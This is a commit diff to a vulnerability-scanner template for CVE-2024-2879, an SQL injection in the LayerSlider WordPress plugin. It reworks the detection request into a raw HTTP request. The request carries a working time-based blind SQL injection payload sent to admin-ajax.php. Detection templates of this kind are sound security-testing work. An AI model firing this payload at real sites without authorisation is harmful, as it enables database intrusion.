Update CVE-2024-2879.yaml

http/cves/2024/CVE-2024-2879.yaml

@@ -1,7 +1,7 @@
 id: CVE-2024-2879
 
 info:
-  name: WordPress Plugin LayerSlider 7.9.11-7.10.0 – Unauthenticated SQL Injection
+  name: WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection
   author: d4ly
   severity: critical
   description: |
@@ -22,7 +22,7 @@ info:
     epss-percentile: 0.07687
   metadata:
     verified: true
-    max-request: 1
+    max-request: 2
     publicwww-query: "/wp-content/plugins/LayerSlider/"
   tags: cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli
 
@@ -32,18 +32,23 @@ http:
   - method: GET
     path:
       - "{{BaseURL}}/wp-content/plugins/LayerSlider/assets/static/public/front.css"
+
     matchers:
       - type: word
+        internal: true
         words:
           - ".ls-clearfix:before"
-        internal: true
+
-  - method: GET
+  - raw:
-    path:
+      - |
-      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))x)--+x)"
+        @timeout: 10s
+        GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1'
+        Host: {{Hostname}}
+
     matchers:
       - type: dsl
         dsl:
-          - duration>=5
+          - duration>=6
           - status_code == 200
           - contains(body, "<script>")
         condition: and